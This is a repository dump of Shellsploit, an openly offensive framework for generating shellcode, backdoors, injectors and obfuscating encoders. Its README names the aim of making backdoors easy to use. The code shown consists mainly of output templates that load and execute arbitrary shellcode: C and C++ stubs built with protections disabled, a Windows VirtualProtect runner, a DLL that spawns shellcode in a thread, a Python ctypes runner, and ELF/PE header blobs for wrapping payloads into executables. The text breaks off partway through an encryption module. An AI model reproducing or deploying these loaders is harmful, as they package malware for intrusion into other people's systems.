├── .gitignore ├── AIM ├── LICENSE ├── README.md ├── VERSION ├── __init__.py ├── easyinstall.py ├── setup.py ├── shell ├── Outputs │ ├── C.py │ ├── Cplusplus.py │ ├── Database │ │ ├── __init__.py │ │ └── exedb.py │ ├── Dll.py │ ├── __init__.py │ ├── exe.py │ ├── header.py │ ├── logger.py │ ├── python.py │ ├── raw.py │ └── txt.py ├── Session │ ├── __init__.py │ ├── backdoors │ │ ├── __init__.py │ │ └── main.py │ ├── encryption.py │ ├── generator.py │ └── netcat.py ├── __init__.py ├── control.py ├── core │ ├── Comp │ │ ├── __init__.py │ │ ├── db.py │ │ └── tab.py │ ├── Injectoroptions.py │ ├── SHELLoptions.py │ ├── __init__.py │ ├── backdoors.py │ ├── color.py │ ├── commands.py │ ├── help.py │ ├── lists.py │ ├── logo │ │ ├── __init__.py │ │ ├── counter.py │ │ └── logo.py │ ├── shellcodeformat.py │ ├── shellcodes.py │ └── whatisthis.py ├── database │ ├── FreeBSDx64 │ │ ├── __init__.py │ │ ├── bin_sh.py │ │ ├── execc.py │ │ ├── reverse_tcp.py │ │ └── tcp_bind.py │ ├── FreeBSDx86 │ │ ├── __init__.py │ │ ├── bin_sh.py │ │ ├── execc.py │ │ ├── read.py │ │ ├── reverse_tcp.py │ │ ├── reverse_tcp2.py │ │ └── tcp_bind.py │ ├── Linux │ │ ├── __init__.py │ │ └── magic.py │ ├── Linux64 │ │ ├── __init__.py │ │ ├── bin_shx64.py │ │ ├── chmod.py │ │ ├── readfilex64.py │ │ ├── reverse_tcpx64.py │ │ └── tcp_bindx64.py │ ├── Linux86 │ │ ├── __init__.py │ │ ├── bin_shx86.py │ │ ├── chmod.py │ │ ├── download.py │ │ ├── execc.py │ │ ├── readfilex86.py │ │ ├── reverse_tcpx86.py │ │ └── tcp_bindx86.py │ ├── LinuxARM │ │ ├── __init__.py │ │ ├── bin_sh.py │ │ ├── chmod.py │ │ ├── execc.py │ │ └── reverse_tcp.py │ ├── LinuxMIPS │ │ ├── __init__.py │ │ ├── bin_sh.py │ │ ├── chmod.py │ │ ├── reverse_tcp.py │ │ └── tcp_bind.py │ ├── OSX64 │ │ ├── __init__.py │ │ ├── bin_sh.py │ │ ├── reverse_tcp.py │ │ └── tcp_bind.py │ ├── OSX86 │ │ ├── __init__.py │ │ ├── bin_sh.py │ │ ├── reverse_tcp.py │ │ └── tcp_bind.py │ ├── Solarisx86 │ │ ├── __init__.py │ │ ├── bin_sh.py │ │ ├── read.py │ │ ├── reverse_tcp.py │ │ └── tcp_bind.py │ ├── Windows │ │ ├── README.md │ │ ├── __init__.py │ │ ├── bind_tcp.py │ │ ├── downloadandexecute.py │ │ ├── execc.py │ │ ├── messagebox.py │ │ ├── rev_tcp.py │ │ └── xor.py │ ├── __init__.py │ ├── generator.py │ └── stackconvert.py ├── disassembly │ ├── Syscalls │ │ ├── __init__.py │ │ ├── freebsd_32.py │ │ ├── linux_32.py │ │ ├── linux_64.py │ │ ├── openbsd_32.py │ │ └── solaris_32.py │ ├── __init__.py │ ├── capstoneheader.py │ ├── dis.py │ └── dis2.py ├── encoders │ ├── __init__.py │ ├── py │ │ ├── __init__.py │ │ ├── payloads.py │ │ ├── pyminifier │ │ │ ├── __init__.py │ │ │ ├── analyze.py │ │ │ ├── compression.py │ │ │ ├── hero.py │ │ │ ├── minification.py │ │ │ ├── obfuscate.py │ │ │ ├── opt.py │ │ │ └── token_utils.py │ │ └── starter.py │ └── shellcode │ │ ├── __init__.py │ │ ├── payloads.py │ │ ├── starter.py │ │ ├── xor.py │ │ └── xor_b3m.py ├── inject │ ├── BFDBackdoors │ │ ├── __init__.py │ │ ├── arm │ │ │ ├── LinuxARMLELF32.py │ │ │ └── __init__.py │ │ ├── backdoor.py │ │ ├── elfbin.py │ │ ├── intel │ │ │ ├── FreeBSDIntelELF32.py │ │ │ ├── LinuxIntelELF32.py │ │ │ ├── LinuxIntelELF64.py │ │ │ ├── MachoIntel32.py │ │ │ ├── MachoIntel64.py │ │ │ ├── WinIntelPE32.py │ │ │ ├── WinIntelPE64.py │ │ │ ├── __init__.py │ │ │ ├── intelCore.py │ │ │ └── intelmodules.py │ │ ├── machobin.py │ │ ├── onionduke │ │ │ ├── OD_stub.exe │ │ │ ├── __init__.py │ │ │ └── onionduke.py │ │ ├── pebin.py │ │ └── winapi │ │ │ ├── __init__.py │ │ │ └── winapi.py │ ├── Linux │ │ └── __init__.py │ ├── Linux64 │ │ ├── __init__.py │ │ └── inject.py │ ├── Linux86 │ │ ├── __init__.py │ │ └── inject.py │ ├── Windows │ │ ├── __init__.py │ │ └── dllinjector.py │ ├── Windowsx64 │ │ └── __init__.py │ ├── Windowsx86 │ │ ├── __init__.py │ │ ├── codecaveinjector.py │ │ ├── loadlibrary.raw │ │ └── tlsInjector.py │ ├── __init__.py │ └── menager.py ├── payloads.py └── shellsploit.py └── shellsploit.py /.gitignore: -------------------------------------------------------------------------------- 1 | Dependences 2 | AIM 3 | VERSION 4 | 5 | __pypcache__/ 6 | *.pyc 7 | *.pyo -------------------------------------------------------------------------------- /AIM: -------------------------------------------------------------------------------- 1 | #SHELLSPLOIT 2 | 3 | 1) Must be dynamic every thing 4 | 2) Must be easy to use even for kids 5 | 3) Must be compatible with every operating system even toast machines 6 | 4) Must be provide shellcodes&backdoors&injectors for every operating system even toast machines 7 | 5) Must be FREE to use (for a lifetime) 8 | 6) JMP 0x1 9 | 10 | 11 | 12 | #Necessarily 13 | 14 | Bomberman&T-Rex must be coding with me. -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | #Shellsploit 2 | ------------- 3 | 4 | Shellsploit let's you generate customized shellcodes, backdoors, injectors for various operating system. 5 | And let's you obfuscation every byte via encoders. 6 | 7 | 8 | 9 | #StableVersion 10 | --------------- 11 | Still not exists stable version, because of too many file(any help would be great hehe). 12 | 13 | 14 | #Dependences 15 | ------------- 16 | root$ sudo pip install capstone 17 | root$ sudo pip install readline(Not necessary for windows coz preinstalled in shellsploit) 18 | root$ sudo pip install pefile 19 | root$ sudo pip install colorama 20 | root$ sudo pip install pylzma 21 | 22 | 23 | #Installation 24 | ------------- 25 | Pip works on both windows/nix machines without problem. Now you are ready to install: 26 | 27 | root$ python setup.py --s/ --setup install 28 | root$ chmod +x shellsploit (if you are using windows just pass this step) 29 | root$ ./shellsploit 30 | 31 | #Uninstallation 32 | ---------------- 33 | root$ python setup.py --s/--setup uninstall 34 | 35 | 36 | #I DONT WANT INSTALL THIS 37 | --------------------------- 38 | 39 | Then don't.You can use shellsploit without install. 40 | 41 | $root cd shellsploit-framework 42 | $root python shellsploit.py or python3 shellsploit.py 43 | 44 | 45 | #Usage 46 | ----- 47 | 48 | usage: shellsploit [-l] [-p] [-o] [-n] 49 | [--host] [--port] 50 | 51 | 52 | optional arguments: 53 | -l, --list Show list of backdoors,shellcodes,encoders,injectors 54 | -p, --payload Set payload for usage 55 | -n, -nc Declare netcat for usage 56 | --host The connect/listen address 57 | --port The connect/listen port 58 | 59 | Inline arguments: 60 | 61 | Main Menu: 62 | help Help menu 63 | os Command directly ur computer 64 | use Select Module For Use 65 | clear Clear the menu 66 | show modules Show Modules of Current Database 67 | show backdoors Show Backdoors of Current Database 68 | show injectors Show Injectors(Shellcode,dll,so etc..) 69 | 70 | Shellcode Menu: 71 | back Exit Current Module 72 | set Set Value Of Options To Modules 73 | ip Get IP address(Requires net connection) 74 | os Command directly ur computer 75 | clear Clear the menu 76 | disas Disassembly the shellcode(Support : x86/x64) 77 | whatisthis Learn which kind of shellcode it is 78 | iteration Encoder iteration time 79 | generate Generate shellcode 80 | output Save option to shellcode(txt,py,c,cpp,exe) 81 | show encoders List all obfucscation encoders 82 | show options Show Current Options Of Selected Module 83 | 84 | Injector Menu: 85 | set Set Value Of Options To Modules 86 | help Help menu 87 | back Exit Current Module 88 | os Command directly ur computer 89 | pids Get PID list of computer 90 | getpid Get specific PID on list(Ex. getpid Python) 91 | 92 | 93 | #Bugs 94 | ------ 95 | 96 | Please do not forget to report bugs! You can submit an issue, pull request, or even directly PM me through my email address. 97 | 98 | 99 | #Screenshots 100 | ------------- 101 | 102 | ![alt tag](http://i.hizliresim.com/28XmmN.png) 103 | ![alt tag](http://i.hizliresim.com/7MrYVv.png) 104 | ![alt tag](http://i.hizliresim.com/g8NqXN.jpg) 105 | ![alt tag](http://i.hizliresim.com/W18pL2.png) 106 | ![alt tag](http://i.hizliresim.com/pBMNO0.png) 107 | ![alt tag](http://i.hizliresim.com/rZP6vV.png) 108 | -------------------------------------------------------------------------------- /VERSION: -------------------------------------------------------------------------------- 1 | Beta 0.3 2 | -------------------------------------------------------------------------------- /__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/__init__.py -------------------------------------------------------------------------------- /easyinstall.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup,find_packages 2 | 3 | 4 | setup( 5 | name = "cmdline-shellsploit", 6 | packages = find_packages(), 7 | entry_points={ 8 | 'console_scripts': [ 9 | 'shellsploit = shell.shellsploit:main', 10 | ] 11 | }, 12 | version = "0.1", 13 | description = ("An open source cuztomize shellcode,backdoor,injector generator."), 14 | author = "B3mB4m", 15 | author_email = "b3mb4m@protonmail.com", 16 | url='https://github.com/b3mb4m/Shellsploit', 17 | ) 18 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from optparse import OptionParser 2 | from os import system 3 | from os import path 4 | from os import unlink 5 | from sys import exit 6 | 7 | 8 | if __name__ == '__main__': 9 | parser = OptionParser() 10 | parser.add_option('-s', '--setup', action="store") 11 | parser.add_option('--user', action="store_true") 12 | options, args = parser.parse_args() 13 | 14 | if not options.setup: 15 | exit("\n\tUsage : setup.py -s/--setup install or uninstall ..\n") 16 | else: 17 | if options.setup == 'install': 18 | if options.user: 19 | system('python easyinstall.py install --record shellsploit.ini --user') 20 | else: 21 | system('python easyinstall.py install --record shellsploit.ini') 22 | 23 | elif options.setup == 'uninstall': 24 | if not path.isfile('shellsploit.ini'): 25 | exit('\n\tIf you want uninstall you must install it first.\n') 26 | else: 27 | files = open('shellsploit.ini', 'r').readlines() 28 | unlink('shellsploit.ini') 29 | print ('') 30 | for x in files: 31 | if path.isfile(x.strip()): 32 | print ('Remove : {0}').format(x.strip()) 33 | unlink(x.strip()) 34 | else: 35 | exit('\nUninstall complate ! \n') 36 | 37 | else: 38 | exit("\n\tUsage : setup.py -s/--setup install or uninstall ..\n") 39 | -------------------------------------------------------------------------------- /shell/Outputs/C.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from header import * 9 | 10 | def CFile( shellcode): 11 | db = """//Project : https://github.com/b3mb4m/Shellsploit 12 | //This file created with shellsploit .. 13 | //%s - %s 14 | //Compile : gcc -fno-stack-protector -z execstack shell.c -o shell 15 | 16 | unsigned char shellcode[] = "%s"; 17 | 18 | int main(void){ 19 | (*(void(*)()) shellcode)(); 20 | } 21 | 22 | 23 | """ % (strftime("%d/%m/%Y"), strftime("%H:%M:%S"), shellcode) 24 | 25 | logs( db, "c") 26 | -------------------------------------------------------------------------------- /shell/Outputs/Cplusplus.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from header import * 9 | 10 | def CplusplusFile( shellcode, win=False): 11 | if win == True: 12 | db = """//Project : https://github.com/b3mb4m/Shellsploit 13 | //This file created with shellsploit .. 14 | //%s - %s 15 | //Compile : gcc shell.c -o shell.exe 16 | 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | 24 | int main(void) 25 | { 26 | char *shellcode = "%s"; 27 | DWORD why_must_this_variable; 28 | BOOL ret = VirtualProtect (shellcode, strlen(shellcode), 29 | PAGE_EXECUTE_READWRITE, &why_must_this_variable); 30 | 31 | if (!ret) { 32 | printf ("VirtualProtect"); 33 | return EXIT_FAILURE; 34 | } 35 | 36 | 37 | ((void (*)(void))shellcode)(); 38 | return EXIT_SUCCESS; 39 | } 40 | 41 | """ % ( time.strftime("%d/%m/%Y"), time.strftime("%H:%M:%S"), shellcode) 42 | 43 | else: 44 | db = """//Project : https://github.com/b3mb4m/Shellsploit 45 | //This file created with shellsploit .. 46 | //%s - %s 47 | //Compile : g++ -fno-stack-protector -z execstack shell.cpp -o shell 48 | 49 | unsigned char shellcode[] = "%s"; 50 | 51 | int main(){ 52 | int (*func)() = (int(*)())shellcode; 53 | func(); 54 | } 55 | 56 | """ % (time.strftime("%d/%m/%Y"), time.strftime("%H:%M:%S"), shellcode) 57 | 58 | 59 | logs( db, "cpp") 60 | 61 | 62 | 63 | -------------------------------------------------------------------------------- /shell/Outputs/Database/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/Outputs/Database/__init__.py -------------------------------------------------------------------------------- /shell/Outputs/Database/exedb.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | 9 | def B3m(): 10 | shelldb = [ 11 | #linux86 12 | "7f454c460101010000000000000000000200030001000000548004083400000000000000000000003400200001000000000000000100000000000000008004080080040858000000001000000700000000100000", 13 | 14 | #linux64 15 | "7f454c4602010100000000000000000002003e000100000080004000000000004000000000000000b0000000000000000000000040003800010040000300020001000000050000000000000000000000000040000000000000004000000000009f000000000000009f0000000000000000002000000000000000000000000000SHELLCODE05002e7368737472746162002e7465787400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000600000000000000800040000000000080000000000000001f000000000000000000000000000000100000000000000000000000000000000100000003000000000000000000000000000000000000009f000000000000001100000000000000000000000000000001000000000000000000000000000000", 16 | 17 | #windows x86/x64 18 | "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010200002179560000000000000000e0000f030b010238000200000002000000000000001000000010000000000000000040000010000000020000040000000100000004000000000000000030000000040000383f00000300000000002000001000000000100000100000000000001000000000000000000000000020000014000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e746578740000001a000000001000000002000000040000000000000000000000000000200000602e6964617461000014000000002000000002000000060000000000000000000000000000400000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000SHELLCODEffffffff00000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", 19 | 20 | #openbsdx86 21 | "0086010704000000000000000000000000000000001000000000000000000000SHELLCODE04000000", 22 | 23 | #solarisx86 24 | "7f454c460101010000000000000000000200030001000000548004083400000000000000000000003400200001000000000000000100000000000000008004080080040858000000001000000700000000100000SHELLCODE", 25 | 26 | #linuxpowerpc 27 | "0095010700000004000000000000000000000000000010000000000000000000SHELLCODE00000004", 28 | 29 | #openbsdpowerpc 30 | "0095010700000004000000000000000000000000000010000000000000000000SHELLCODE00000004", 31 | 32 | #linuxsparc 33 | "7f454c460102010000000000000000000002000200000001000100540000003400000000000000000034002000010000000000000000000100000000000100000001000000000058000100000000000700010000SHELLCODE", 34 | 35 | #freebsdsparc 36 | "7f454c460102010900000000000000000002000200000001000100540000003400000000000000000034002000010000000000000000000100000000000100000001000000000058000100000000000700010000SHELLCODE", 37 | 38 | #opensbdsparc 39 | "008a010700000004000000000000000000000000000010000000000000000000SHELLCODE00000004", 40 | 41 | #solarissparc 42 | "7f454c460102010000000000000000000002000200000001000100540000003400000000000000000034002000010000000000000000000100000000000100000001000000000058000100000000000700010000SHELLCODE", 43 | 44 | #linuxarm 45 | "008f010700000004000000000000000000000000000010000000000000000000SHELLCODE00000004", 46 | 47 | #freebsdarm 48 | "008f010700000004000000000000000000000000000010000000000000000000SHELLCODE00000004", 49 | 50 | #opensbdarm 51 | "008f010700000004000000000000000000000000000010000000000000000000SHELLCODE00000004", 52 | ] 53 | return shelldb 54 | 55 | 56 | -------------------------------------------------------------------------------- /shell/Outputs/Dll.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from header import * 9 | 10 | DLL_TEMPLATE = """/** 11 | * C source to generate a DLL using shellsploit. 12 | * %s - %s 13 | * 14 | * To compile using CL: 15 | * C:> cl.exe MyFile.c /DLL /OUT:MyDll.dll /LD 16 | * 17 | * Ref: 18 | * - https://gist.github.com/hugsy/e5c4ce99cd7821744f95 19 | * - https://gist.github.com/hugsy/9797644 20 | * @_hugsy_ 21 | * 22 | */ 23 | 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | 34 | unsigned char shellcode[] = "%s"; 35 | 36 | DWORD WINAPI SpawnShellcode(LPVOID lpSc) 37 | { 38 | __asm mov eax, [lpSc] 39 | __asm call eax 40 | return 0; 41 | } 42 | 43 | void __declspec(dllexport) ControlRun(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) 44 | { 45 | LPVOID code = NULL; 46 | DWORD dwBytesToRead = sizeof(shellcode); 47 | int pID; 48 | 49 | code = VirtualAlloc(NULL, dwBytesToRead, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 50 | if (!code) { 51 | return; 52 | } 53 | 54 | memset(code, 0, dwBytesToRead); 55 | memcpy(code, shellcode, dwBytesToRead); 56 | WaitForSingleObject(CreateThread(NULL, 0, SpawnShellcode, code, 0, &pID), INFINITE); 57 | VirtualFree(code, dwBytesToRead, MEM_RELEASE); 58 | 59 | return; 60 | } 61 | """ 62 | 63 | def DllFile(shellcode): 64 | db = DLL_TEMPLATE % (time.strftime("%d/%m/%Y"), time.strftime("%H:%M:%S"), shellcode) 65 | logs( db, "c") 66 | 67 | -------------------------------------------------------------------------------- /shell/Outputs/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/Outputs/__init__.py -------------------------------------------------------------------------------- /shell/Outputs/exe.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | def ExeFile( shellcode, OS=None): 9 | if OS == None: 10 | OS = detectOS() 11 | 12 | from .logger import logs 13 | from .Database.exedb import B3m 14 | 15 | 16 | db = B3m() 17 | padd = "" 18 | if OS == "linux86": 19 | padd = db[0] 20 | elif OS == "linux64": 21 | padd = db[1] 22 | elif OS == "windows": 23 | padd = db[2] 24 | elif OS == "openbsdx86": 25 | padd = db[3] 26 | elif OS == "solarisx86": 27 | padd = db[4] 28 | elif OS == "linuxpowerpc": 29 | padd = db[5] 30 | elif OS == "openbsdpowerpc": 31 | padd = db[6] 32 | elif OS == "linuxsparc": 33 | padd = db[7] 34 | elif OS == "freebsdsparc": 35 | padd = db[8] 36 | elif OS == "opensbdsparc": 37 | padd = db[9] 38 | elif OS == "solarissparc": 39 | padd = db[10] 40 | elif OS == "linuxarm": 41 | padd = db[11] 42 | elif OS == "freebsdarm": 43 | padd = db[12] 44 | elif OS == "opensbdarm": 45 | padd = db[13] 46 | else: 47 | print "Not supported os .." 48 | return 49 | 50 | 51 | shellcode = shellcode.replace("\\x", "") 52 | shellcode = padd.replace("SHELLCODE", shellcode) 53 | logs( shellcode.decode("hex"), None) 54 | 55 | 56 | 57 | def architectureDetect(): 58 | #https://github.com/kennethreitz/its.py/blob/master/its.py 59 | from struct import calcsize 60 | if calcsize('P') * 8 == 64: 61 | return 64 62 | elif calcsize('P') * 8 == 32: 63 | return 32 64 | else: 65 | #Are you on fcking 8bits OS ? or 128bits ?! 66 | return "Not supported architecture .." 67 | 68 | def detectOS(): 69 | from sys import platform 70 | 71 | if architectureDetect() == 32: 72 | if platform.lower() == "linux" or platform == "linux2": 73 | return "linux86" 74 | #elif platform.lower() == "darwin": 75 | #print "mac osx" 76 | elif platform.lower() == "win32": 77 | return "windows" 78 | elif platform.lower() == "sunos": 79 | return "solarisx86" 80 | elif "freebsd" in platform.lower(): 81 | return "freebsdx86" 82 | elif "openbsd" in platform.lower(): 83 | return "openbsdx86" 84 | 85 | #I will fix it soon :( 86 | elif architectureDetect() == 64: 87 | if "freebsd" in platform.lower(): 88 | return "freebsdx64" 89 | elif "win32" in platform.lower(): 90 | return "windows" 91 | 92 | else: 93 | #This is can be possible ? .. 94 | print ("Not supported architecture ..") 95 | 96 | -------------------------------------------------------------------------------- /shell/Outputs/header.py: -------------------------------------------------------------------------------- 1 | from time import strftime 2 | from .logger import logs 3 | from binascii import unhexlify -------------------------------------------------------------------------------- /shell/Outputs/logger.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from random import randint 9 | import os 10 | 11 | def logs( data=None, extension=None): 12 | while True: 13 | if extension == None: 14 | name = "{0}".format(str(randint(0, 999999999))) 15 | else: 16 | name = "{0}.{1}".format(str(randint(0, 999999999)),extension) 17 | 18 | if not os.path.isfile(name): 19 | break 20 | 21 | if extension == None: 22 | logs = open(name, "wb") 23 | else: 24 | logs = open(name, "w") 25 | 26 | logs.write(data) 27 | logs.close() 28 | if extension != None: 29 | print ("\n\t[+]Script file : {0} saved !\n".format(os.getcwd()+os.sep+name)) 30 | else: 31 | print ("\n\t[+]Executable file : {0} saved !\n".format(os.getcwd()+os.sep+name)) 32 | 33 | -------------------------------------------------------------------------------- /shell/Outputs/python.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | 9 | from header import * 10 | 11 | def PyFile( shellcode): 12 | db = """#!/usr/bin/python 13 | 14 | import ctypes 15 | import multiprocessing 16 | 17 | #Project : https://github.com/b3mb4m/Shellsploit 18 | #This file created with shellsploit .. 19 | #{0} - {1} 20 | 21 | 22 | shellcode_data = (b"{2}") 23 | 24 | shellcode = ctypes.c_char_p(shellcode_data) 25 | function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None)) 26 | addr = ctypes.cast(function, ctypes.c_void_p).value 27 | libc = ctypes.CDLL('libc.so.6') 28 | pagesize = libc.getpagesize() 29 | addr_page = (addr // pagesize) * pagesize 30 | 31 | for page_start in range(addr_page, addr + len(shellcode_data), pagesize): 32 | assert libc.mprotect(page_start, pagesize, 0x7) == 0 33 | function() 34 | """.format(strftime("%d/%m/%Y"), strftime("%H:%M:%S"), shellcode) 35 | 36 | logs( db, "py") 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /shell/Outputs/raw.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from header import * 9 | 10 | 11 | def RawFile( shellcode): 12 | sc = unhexlify(shellcode.replace("\\x", "")) 13 | logs( sc, None) 14 | -------------------------------------------------------------------------------- /shell/Outputs/txt.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from header import * 9 | 10 | def TxtFile( shellcode): 11 | db = '''#Project : https://github.com/b3mb4m/Shellsploit 12 | #This file created with shellsploit .. 13 | #{0} - {1} 14 | 15 | 16 | {2} 17 | 18 | '''.format(strftime("%d/%m/%Y"), strftime("%H:%M:%S"), shellcode) 19 | 20 | logs( db, "txt") 21 | -------------------------------------------------------------------------------- /shell/Session/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/Session/__init__.py -------------------------------------------------------------------------------- /shell/Session/backdoors/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/Session/backdoors/__init__.py -------------------------------------------------------------------------------- /shell/Session/encryption.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | #------------------Bombermans Team---------------------------------# 4 | #Author : B3mB4m 5 | #Concat : b3mb4m@protonmail.com 6 | #Project : https://github.com/b3mb4m/Shellsploit 7 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 8 | #------------------------------------------------------------------# 9 | 10 | 11 | """ 12 | Except AES every function is working on 2x and 3x.We'll fix it soon and add couple of things to .. 13 | """ 14 | 15 | def base64( TEXT, choice): 16 | from base64 import 